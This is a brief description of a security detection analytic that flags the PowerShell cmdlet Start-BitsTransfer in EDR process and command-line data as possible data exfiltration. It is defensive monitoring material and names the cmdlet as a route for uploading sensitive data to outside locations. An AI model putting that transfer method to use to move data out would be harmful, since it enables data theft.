This analytic detects the use of the PowerShell command `Start-BitsTransfer` which is commonly leveraged for file transfer operations, including potential data exfiltration by adversaries. Data collected by Endpoint Detection and Response (EDR) mechanisms captures process creation events and the command-line arguments associated with those processes, enabling security teams to monitor activities indicative of possible threats. Given its legitimate use in administration, the risk lies in its potential abuse to upload sensitive data to unauthorized external locations. Therefore, confirming the malicious nature of this execution can play a crucial role in preventing sensitive data breaches.